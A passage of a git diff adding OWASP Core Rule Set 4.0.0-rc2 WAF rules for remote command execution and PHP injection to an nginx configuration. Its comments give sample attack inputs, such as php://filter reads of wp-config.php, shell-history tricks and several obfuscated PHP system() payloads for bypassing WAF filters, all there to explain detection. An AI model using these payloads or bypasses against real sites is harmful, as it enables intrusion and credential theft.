tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# -=[ Bypass Rule 930120 (wildcard) ]=- +# +# When Paranoia Level is set to 1 and 2, a Remote Command Execution +# could be exploited bypassing rule 930120 (OS File Access Attempt) +# by using wildcard characters. +# +# In some other cases, it could be bypassed even if the Paranoia Level is set to 3. +# Please, keep in mind that this rule could lead to many false positives. +# +# The following two blog posts explain the evasions this rule is designed to detect: +# - https://medium.com/secjuice/waf-evasion-techniques-718026d693d8 +# - https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 + +SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \ + "id:932190,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:urlDecodeUni,t:normalizePath,t:cmdLine,\ + msg:'Remote Command Execution: Wildcard bypass technique attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ SMTP commands ]=- +# +# This rule prevents execution of SMTP related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932300. +# +# Rule 932301 is a stricter sibling of rule 932300. +# +# Regular expression generated from regex-assembly/932301.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932301 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:DATA|QUIT|HELP(?: .{1,255})?)" \ + "id:932301,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: SMTP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ IMAP4 Command Execution ]= +# +# This rule prevents execution of IMAP4 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932310. +# +# Rule 932311 is a stricter sibling of rule 932310. +# +# Regular expression generated from regex-assembly/932311.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932311 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:C(?:(?:REATE|OPY [\*,0-:]+) [\"-#%-&\*\--9A-Z\x5c_a-z]+|APABILITY|HECK|LOSE)|DELETE [\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|EX(?:AMINE [\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|PUNGE)|FETCH [\*,0-:]+|L(?:IST [\"-#\*\--9A-Z\x5c_a-z~]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|OG(?:IN [\--\.0-9@_a-z]{1,40} .*?|OUT))|RENAME [\"-#%-&\*\--9A-Z\x5c_a-z]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|S(?:E(?:LECT [\"-#%-&\*\--9A-Z\x5c_a-z]+|ARCH(?: CHARSET [\--\.0-9A-Z_a-z]{1,40})? (?:(KEYWORD \x5c)?(?:A(?:LL|NSWERED)|BCC|D(?:ELETED|RAFT)|(?:FLAGGE|OL)D|RECENT|SEEN|UN(?:(?:ANSWER|FLAGG)ED|D(?:ELETED|RAFT)|SEEN)|NEW)|(?:BODY|CC|FROM|HEADER .{1,100}|NOT|OR .{1,255}|T(?:EXT|O)) .{1,255}|LARGER [0-9]{1,20}|[\*,0-:]+|(?:BEFORE|ON|S(?:ENT(?:(?:BEFOR|SINC)E|ON)|INCE)) \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4}\"?|S(?:MALLER [0-9]{1,20}|UBJECT .{1,255})|U(?:ID [\*,0-:]+?|NKEYWORD \x5c(Seen|(?:Answer|Flagg)ed|D(?:eleted|raft)|Recent))))|T(?:ORE [\*,0-:]+? [\+\-]?FLAGS(?:\.SILENT)? (?:\(\x5c[a-z]{1,20}\))?|ARTTLS)|UBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+)|UN(?:SUBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+|AUTHENTICATE)|NOOP)" \ + "id:932311,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: IMAP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ POP3 Command Execution ]= +# +# This rule prevents execution of POP3 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932320. +# +# Rule 932321 is a stricter sibling of rule 932320. +# +# Regular expression generated from regex-assembly/932321.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932321 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?:QUI|STA|RSE)(?i:T)|NOOP|CAPA)" \ + "id:932321,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: POP3 Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# =[ Unix shell history invocation ]= +# +# This rule is a stricter sibling of 932330. +# Shell history can also be invoked by providing an absolute position: '!1' or by repeating the last command '!!'. +# The latter might seem harmless as you would expect that it already requires a successful exploitation, but it is a threat in disguise. +# +# Imagine the following requests: +# GET /?rce=c +# GET /?rce=!!!! +# The last request will invoke /usr/bin/cc, which is otherwise blocked by 932150. +# +# Neither !1 nor !! is necessarily valid speech, but blocking either of them is much more likely to cause false-positives than 932330. +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !(?:\d|!)" \ + "id:932331,\ + phase:2,\ + block,\ + t:none,\ + msg:'Remote Command Execution: Unix shell history invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE" diff --git a/nginx/config/owasp-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/nginx/config/owasp-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf new file mode 100644 index 00000000..b438b6bc --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf @@ -0,0 +1,768 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ PHP Injection Attacks ]=- +# +# [ References ] +# https://rips-scanner.sourceforge.net/ +# https://wiki.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh +# + +# +# [ PHP Open Tag Found ] +# +# Detects PHP open tags "', but +# this resulted in false positives which were difficult to prevent. +# Therefore, that pattern is now checked by rule 933190 in paranoia levels +# 3 or higher. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:/|\x5c)?php\])" \ + "id:933100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Open Tag Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# [ PHP Script Uploads ] +# +# Block file uploads with filenames ending in PHP related extensions +# (.php, .phps, .phtml, .php5 etc). +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload +# +# Attackers may use such a vulnerability to achieve remote code execution +# by uploading a .php file. If the upload storage location is predictable +# and not adequately protected, the attacker may then request the uploaded +# .php file and have the code within it executed on the server. +# +# Also block files with just dot (.) characters after the extension: +# https://www.rapid7.com/blog/post/2013/08/15/time-to-patch-joomla/ +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.ph(?:p\d*|tml|ar|ps|t|pt)\.*$" \ + "id:933110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Configuration Directives ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-config-directives.data" \ + "id:933120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,\ + msg:'PHP Injection Attack: Configuration Directive Found',\ + logdata:'Matched Data: %{TX.933120_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.933120_tx_0=%{tx.0}',\ + chain" + SecRule MATCHED_VARS "@pm =" \ + "capture,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Variables ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-variables.data" \ + "id:933130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP I/O Streams ] +# +# The "php://" syntax can be used to refer to various objects, such as local files (for LFI), +# remote urls (for RFI), or standard input/request body. Its occurrence indicates a possible attempt +# to either inject PHP code or exploit a file inclusion vulnerability in a PHP web app. +# +# Examples: +# php://filter/resource=./../../../wp-config.php +# php://filter/resource=http://www.example.com +# php://stdin +# php://input +# +# http://php.net/manual/en/wrappers.php.php +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)" \ + "id:933140,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: I/O Stream Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Wrappers ] +# +# PHP comes with many built-in wrappers for various URL-style protocols for use with the filesystem +# functions such as fopen(), copy(), file_exists() and filesize(). Abusing of PHP wrappers like phar:// +# could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even +# wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE. +# +# Valid PHP wrappers can be found in the PHP documentation here: +# https://www.php.net/manual/en/wrappers.php +# +# Regular expression generated from regex-assembly/933200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933200 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://" \ + "id:933200,\ + phase:2,\ + block,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ + msg:'PHP Injection Attack: Wrapper scheme detected',\ + logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions ] +# +# Detecting PHP function names is useful to block PHP code injection attacks. +# There are many PHP functions. We have to strike a balance between robust detection +# of PHP code in content, and the risk of false positives. +# +# The list of PHP functions is divided into four groups of varying attack/false positive risk. +# Four separate rules are used to detect these groups of functions: +# +# - Rule 933150: ~40 words highly common to PHP injection payloads and extremely rare in +# natural language or other contexts. +# Examples: 'base64_decode', 'file_get_contents'. +# These words are detected as a match directly using @pmFromFile. +# Function names are defined in php-function-names-933150.data +# +# - Rule 933160: ~220 words which are common in PHP code, but have a higher chance to cause +# false positives in natural language or other contexts. +# Examples: 'chr', 'eval'. +# To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'. +# Regexp is generated from function names in util/regexp-assemble/data/933160.data +# +# - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords. +# Examples: 'addslashes', 'array_diff'. +# For performance reasons, the @pmFromFile operator is used, and many functions from lesser +# used PHP extensions are removed. +# To mitigate false positives, we only match when the '(' character is also found. +# This rule only runs in paranoia level 2 or higher. +# Function names are defined in php-function-names-933151.data +# +# - Rule 933161: ~200 words with short or trivial names, possibly leading to false positives. +# Examples: 'abs', 'cos'. +# To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'. +# This rule only runs in paranoia level 3 or higher. +# Regexp is generated from function names in util/regexp-assemble/data/933161.data +# + + +# +# [ PHP Functions: High-Risk PHP Function Names ] +# +# Rule 933150 contains a small list of function names which are highly indicative of a PHP +# injection attack, for example 'base64_decode'. +# We block these function names outright, without using a complex regexp or chain. +# This could make the detection a bit more robust against possible bypasses. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \ + "id:933150,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions: High-Risk PHP Function Calls ] +# +# Some PHP function names have a certain risk of false positives, due to short +# names, full or partial overlap with common natural language terms, uses in +# other contexts, et cetera. Some examples are 'eval', 'exec', 'system'. +# +# For these function names, we apply a regexp to look for PHP function syntax. +# The regexp looks for a word boundary and adjoining parentheses. +# For instance, we want to block 'eval()', but we want to allow 'medieval()'. +# +# We have to be careful of possible bypasses using comment syntax. Examples: +# +# system(...) +# system (...) +# system\t(...) +# system /*comment*/ (...) +# system /*multiline \n comment*/ (...) +# system //comment \n (...) +# system #comment \n (...) +# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regular expression generated from regex-assembly/933160.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933160 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|file(?:group)?|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|md5|o(?:pendir|rd)|p(?:assthru|open|rev)|(?:read|tmp)file|un(?:pac|lin)k|s(?:tat|ubstr|ystem))(?:/(?:\*.*\*/|/.*)|#.*|[\s\v\"])*[\"']*\)?[\s\v]*\(.*\)" \ + "id:933160,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: High-Risk PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Object Injection ] +# +# PHP Object Injection is an application level vulnerability that could allow +# an attacker to perform different kinds of malicious attacks, such as +# Code Injection, SQL Injection, Path Traversal and Application Denial of Service, +# depending on the context. +# +# The vulnerability occurs when user-supplied input is not properly sanitized +# before being passed to the unserialize() PHP function. Since PHP allows object +# serialization, attackers could pass ad-hoc serialized strings to a vulnerable +# unserialize() call, resulting in an arbitrary PHP object(s) injection into the +# application scope. +# +# https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection +# +# In serialized form, PHP objects have the following format: +# +# O:8:"stdClass":1:{s:1:"a";i:2;} +# O:3:"Foo":0:{} +# +# Also detected are PHP objects with a custom unserializer: +# https://www.phpinternalsbook.com/php5/classes_objects/serialization.html +# These have the following format: +# +# C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} +# C:3:"Foo":23:{s:15:"My private data";} +# +# HTTP headers are inspected, since PHP object injection vulnerabilities have been +# found in applications parsing them: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 (User-Agent header) +# https://www.exploit-db.com/exploits/39033/ (X-Forwarded-For header) +# http://karmainsecurity.com/KIS-2015-10 (Host header) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx [oOcC]:\d+:\".+?\":\d+:{.*}" \ + "id:933170,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Serialized Object Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +# +# [ PHP Functions: Variable Function Calls ] +# +# PHP 'variable functions' provide an alternate syntax for calling PHP functions. +# http://php.net/manual/en/functions.variable-functions.php +# +# An attacker may use variable function syntax to evade detection of function +# names during exploitation of a remote code execution vulnerability. +# An example to use the 'file_get_contents' function while evading rule 933150: +# +# $fn = 'file_' . 'get_' . 'contents'; +# echo $fn('wp-co' . 'nfig.php'); +# +# Some examples from obfuscated malware: +# +# $OOO0000O0(...) +# @$b374k(...) +# $_[@-_]($_[@!+_] ) +# +# A breakdown of the regular expression: +# +# \$+ +# The variable's '$' char, or multiple '$' for 'variable variables': +# http://php.net/manual/en/language.variables.variable.php +# (?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+}) +# One of the following: +# - A variable name; regexp from http://php.net/language.variables.basics +# - A nonempty expression for variable variables: ${'fn'} or $ {'fn'} +# (?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)* +# Optional whitespace, array access, or comments +# \(.*\) +# Parentheses optionally containing function parameters +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$+(?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})(?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933180,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP Functions: Variable Function Prevent Bypass ] +# +# Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ +# Regex test on https://regex101.com/r/x1tfXG/1 +# the rule 933180 could be bypassed by using the following payloads: +# +# - (system)('uname'); +# - (sy.(st).em)('uname'); +# - (string)"system"('uname'); +# - define('x', 'sys' . 'tem');(x)/* comment */('uname'); +# - $y = 'sys'.'tem';($y)('uname'); +# - define('z', [['sys' .'tem']]);(z)[0][0]('uname'); +# - (system)(ls); +# - (/**/system)(ls/**/); +# - (['system'])[0]('uname'); +# - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++); +# +# This rule blocks all payloads above and avoids to block values like: +# +# - [ACME] this is a test (just a test) +# - Test (with two) rounded (brackets) +# +# Regular expression generated from regex-assembly/933210.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933210 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\);" \ + "id:933210,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" 